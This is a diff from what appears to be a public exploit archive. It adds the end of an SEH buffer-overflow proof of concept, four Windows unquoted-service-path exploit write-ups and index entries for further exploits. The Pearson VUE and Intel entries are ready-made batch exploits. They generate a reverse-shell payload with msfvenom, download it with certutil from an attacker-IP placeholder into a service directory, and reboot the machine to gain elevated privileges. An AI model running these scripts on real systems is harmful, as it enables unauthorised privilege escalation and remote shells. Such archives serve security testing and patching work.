buffer = crash + Next_SE_Pointer + SE_Handler + "\x90" * 20 + payload + "\x90" * 200
f=open("PoC6.txt","w")
f.write(buffer)
f.close()
'''
----------------------------------
| NEXT SEH Pointer |
--|------ ESP | | < ------- A * 209
| |--------------------------------- |
| | SE_Handler | |
| | #POP #POP #RET | | |
| | -------------------------------| |
| Stack
|
|
|______ -------------------------
| PAYLOAD | -------- call | KALI |
__________________________
'''

View file

@ -0,0 +1,24 @@
#Exploit Title: EPSON Status Monitor 3 'EPSON_PM_RPCV4_06' - Unquoted Service Path
#Exploit Author : SamAlucard
#Exploit Date: 2020-27-11
#Vendor : SEIKO EPSON Corp
#Version : EPSON_PM_RPCV4_06 8.0
#Vendor Homepage : https://epson.com
#Tested on OS: Windows 7 Pro
#Analyze PoC :
==============
C:\>sc qc EPSON_PM_RPCV4_06
[SC] QueryServiceConfig CORRECTO
NOMBRE_SERVICIO: EPSON_PM_RPCV4_06
TIPO : 10 WIN32_OWN_PROCESS
TIPO_INICIO : 2 AUTO_START
CONTROL_ERROR : 1 NORMAL
NOMBRE_RUTA_BINARIO: C:\Program Files\Common Files\EPSON\EPW!3
SSRP\E_S60RPB.EXE
GRUPO_ORDEN_CARGA :
ETIQUETA : 0
NOMBRE_MOSTRAR : EPSON V3 Service4(06)
DEPENDENCIAS :
NOMBRE_INICIO_SERVICIO: LocalSystem

View file

@ -0,0 +1,35 @@
# Exploit Title: Global Registration Service 1.0.0.3 - 'GREGsvc.exe' Unquoted Service Path
# Discovery by: Emmanuel Lujan
# Discovery Date: 2020-11-26
# Vendor Homepage: https://www.acer.com/ac/en/US/content/home
# Tested Version: 1.0.0.3
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 7 Home Premium x64
# Step to discover Unquoted Service Path:
C:\>wmic service get name, pathname, displayname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """
GREGService GREGServ
ice C:\Program Files (x86)\Acer\Registration\G
REGsvc.exe Auto
# Service info:
C:\>sc qc GregService
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: GREGService
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\Acer\Registration\GREGsvc.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : GREGService
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
#Exploit:
A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.

View file

@ -0,0 +1,73 @@
# Exploit Title: Pearson Vue VTS 2.3.1911 Installer - VUEApplicationWrapper Unquoted Service Path
# Discovery by: Jok3r
# Discovery Date: 2020-09-14
# Vendor Homepage: https://home.pearsonvue.com/
# Software Link: https://vss.pearsonvue.com/VSSFiles/Documents/ENU_TCInstallGuide/Download_VTS_Installer.htm
# Tested Version: 2.3.1911
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 10 Pro x64 es
#Description:
The Application Wrapper is the component that automates the Pearson VUE Testing System. The Wrapper is a scheduler that runs in the background on the test centers server.
VUEApplicationWrapper service has an unquoted service path vulnerability and insecure file permissions on "\Pearson VUE\" directory that allows to overwrite by everyone so that unauthorized local user can leverage privileges to VUEService user that has administrative rights.
# Detection of unquoted service path:
C:\Users\VUEService>wmic service get name, pathname, displayname, startmode| findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "Pearson" |findstr /i /v """
VUE Application Wrapper
VUEApplicationWrapper C:\Pearson VUE\VUE
Testing System\bin\VUEWrapper.exe
Auto
C:\Users\VUEService>sc qc VUEApplicationWrapper
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: VUEApplicationWrapper
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Pearson VUE\VUE TestingSystem\bin\VUEWrapper.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : VUE Application Wrapper
DEPENDENCIES : lanmanworkstation
SERVICE_START_NAME : .\VUEService
#Detection of insecure file permissions:
PS C:\Users\VUEService> Get-Acl -Path "c:\Pearson Vue\"
Directory: C:\
Path Owner Access
---- ----- ------
Pearson Vue BUILTIN\Administrators Everyone Allow FullControl...
#Exploit code:
ECHO [+] executing command: "wmic service get name,pathname,displayname,startmode | findstr /i "Auto" | findstr /i"Pearson" | findstr /i /v "C:\Windows\\" | findstr /i /v """"
wmic service get name,pathname,displayname,startmode | findstr /i "Auto" |findstr /i "Pearson" | findstr /i /v "C:\Windows\\" | findstr /i /v """
sc qc VUEApplicationWrapper
powershell.exe -ep bypass -nop -c "Get-Acl -Path 'c:\Pearson Vue\'"
ECHO [+] Enumeration was completed successfully.
::Create VUE.exe with following commands on your kali and serve it on port 80. Also listen port 443 with netcat for reverse shell.
::msfvenom -p windows/x64/shell/reverse_tcp LHOST=<Your IP Address>LPORT=443 -f exe > VUE.exe
ECHO [*] If you create VUE.exe under "\Pearson VUE\" directory with your privileges, you might be able to get VUEService user privileges after windows was rebooted.
certutil -urlcache -split -f http://<YOUR_IP_ADDRESS>/VUE.exe "C:\PearsonVUE\VUE.exe"
ECHO [*] Downloading VUE executable...
PAUSE
IF EXIST "C:\Pearson VUE\VUE.exe" (
ECHO [+] The download was successful.
) ELSE (
ECHO [-] The download was unsuccessful.
PAUSE
)
ECHO [!] If you continue, system will be rebooted.
PAUSE
shutdown /r /t 0
::code end

View file

@ -0,0 +1,44 @@
# Exploit Title: Intel(r) Management and Security Application 5.2 - User Notification Service Unquoted Service Path
# Date: 2020-08-28
# Exploit Author: Metin Yunus Kandemir
# Vendor Homepage: https://www.intel.com/
# Version: v5.2
# Tested on: Windows 7
# Source: https://www.totalpentest.com/post/intel-r-user-notification-service-unquoted-service-path-privilege-escalation
@ECHO OFF
ECHO
=======================================================================================================================
ECHO INTEL(R) MANAGEMENT AND SECURITY APPLICATION USER NOTIFICATION SERVICE 5.2 - Unquoted Service Path Privilege Escalation
ECHO
=======================================================================================================================
ECHO [+] executing command: "wmic service get name,pathname,displayname,startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """"
wmic service get name,pathname,displayname,startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """
sc qc UNS
ECHO [+] Your mandoroty level is:
whoami /groups | findstr /B /C:"Mandatory Label"
::Create Privacy.exe with following commands on your kali and serve it on port 80. Also listen port 443 with netcat for reverse shell.
::msfvenom -p windows/shell/reverse_tcp LHOST=<Your IP Address> LPORT=443 -f exe > Privacy.exe
ECHO [?]
ECHO [+] Enumeration was completed successfully.
ECHO [?] If you create Privacy.exe under Intel directory with your privileges, you might be able to get SYSTEM reverse shell after windows was rebooted.
PAUSE
certutil -urlcache -split -f http://<YOUR_IP_ADDRESS>/Privacy.exe "C:\Program Files (x86)\Common Files\Intel\Privacy.exe"
IF EXIST "C:\Program Files (x86)\Common Files\Intel\Privacy.exe" (
ECHO [+] The download was successful.
) ELSE (
ECHO [-] The download was unsuccessful.
PAUSE
)
ECHO [!] If you continue, system will reboot.
PAUSE
shutdown /r /t 0
::code end
#Exploit:
A successful attempt would require the local user to be able to insert
their code in the system root path undetected by the OS or other security
applications where it could potentially be executed during application
startup or reboot. If successful, the local user's code would execute with
the elevated privileges of the application.

View file

@ -11211,6 +11211,11 @@ id,file,description,date,author,type,platform,port
49101,exploits/windows/local/49101.txt,"Wondershare Driver Install Service help 10.7.1.321 - 'ElevationService' Unquote Service Path",2020-11-25,"Luis Sandoval",local,windows,
49108,exploits/multiple/local/49108.txt,"SAP Lumira 1.31 - Stored Cross-Site Scripting",2020-11-27,"Ilca Lucian Florin",local,multiple,
49116,exploits/windows/local/49116.py,"Foxit Reader 9.0.1.1049 - Arbitrary Code Execution",2020-11-27,CrossWire,local,windows,
49134,exploits/windows/local/49134.py,"10-Strike Network Inventory Explorer 8.65 - Buffer Overflow (SEH)",2020-12-01,Sectechs,local,windows,
49141,exploits/windows/local/49141.txt,"EPSON Status Monitor 3 'EPSON_PM_RPCV4_06' - Unquoted Service Path",2020-12-01,SamAlucard,local,windows,
49142,exploits/windows/local/49142.txt,"Global Registration Service 1.0.0.3 - 'GREGsvc.exe' Unquoted Service Path",2020-12-01,"Emmanuel Lujan",local,windows,
49143,exploits/windows/local/49143.txt,"Pearson Vue VTS 2.3.1911 Installer - VUEApplicationWrapper Unquoted Service Path",2020-12-01,Jok3r,local,windows,
49144,exploits/windows/local/49144.bat,"Intel(r) Management and Security Application 5.2 - User Notification Service Unquoted Service Path",2020-12-01,"Metin Yunus Kandemir",local,windows,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -43349,3 +43354,16 @@ id,file,description,date,author,type,platform,port
49124,exploits/hardware/webapps/49124.py,"ATX MiniCMTS200a Broadband Gateway 2.0 - Credential Disclosure",2020-11-30,"Zagros Bingol",webapps,hardware,
49125,exploits/windows/webapps/49125.py,"Rejetto HttpFileServer 2.3.x - Remote Command Execution (3)",2020-11-30,"Óscar Andreu",webapps,windows,
49126,exploits/hardware/webapps/49126.py,"Intelbras Router RF 301K 1.1.2 - Authentication Bypass",2020-11-30,"Kaio Amaral",webapps,hardware,
49128,exploits/php/webapps/49128.txt,"TypeSetter 5.1 - CSRF (Change admin e-mail)",2020-12-01,"Alperen Ergel",webapps,php,
49129,exploits/php/webapps/49129.txt,"Joomla! Component GMapFP 3.5 - Unauthenticated Arbitrary File Upload",2020-12-01,ThelastVvV,webapps,php,
49130,exploits/php/webapps/49130.py,"Wordpress Plugin EventON Calendar 3.0.5 - Reflected Cross-Site Scripting",2020-12-01,B3KC4T,webapps,php,
49131,exploits/php/webapps/49131.txt,"Online Shopping Alphaware 1.0 - Error Based SQL injection",2020-12-01,"Moaaz Taha",webapps,php,
49132,exploits/php/webapps/49132.py,"Pharmacy/Medical Store & Sale Point 1.0 - 'email' SQL Injection",2020-12-01,naivenom,webapps,php,
49133,exploits/multiple/webapps/49133.py,"Setelsa Conacwin 3.7.1.2 - Local File Inclusion",2020-12-01,"Bryan Rodriguez Martin",webapps,multiple,
49135,exploits/php/webapps/49135.txt,"Multi Restaurant Table Reservation System 1.0 - Multiple Persistent XSS",2020-12-01,yunaranyancat,webapps,php,
49136,exploits/php/webapps/49136.txt,"Tailor Management System 1.0 - Unrestricted File Upload to Remote Code Execution",2020-12-01,"Saeed Bala Ahmed",webapps,php,
49137,exploits/php/webapps/49137.txt,"LEPTON CMS 4.7.0 - 'URL' Persistent Cross-Site Scripting",2020-12-01,"Sagar Banwa",webapps,php,
49138,exploits/php/webapps/49138.txt,"Medical Center Portal Management System 1.0 - 'login' SQL Injection",2020-12-01,"Aydın Baran Ertemir",webapps,php,
49139,exploits/php/webapps/49139.txt,"Pandora FMS 7.0 NG 749 - Multiple Persistent Cross-Site Scripting Vulnerabilities # Date: 11-14-2020",2020-12-01,"Matthew Aberegg",webapps,php,
49140,exploits/php/webapps/49140.txt,"Social Networking Site - Authentication Bypass (SQli)",2020-12-01,gh1mau,webapps,php,
49145,exploits/multiple/webapps/49145.txt,"Tendenci 12.3.1 - CSV/ Formula Injection",2020-12-01,"Mufaddal Masalawala",webapps,multiple,

Can't render this file because it is too large.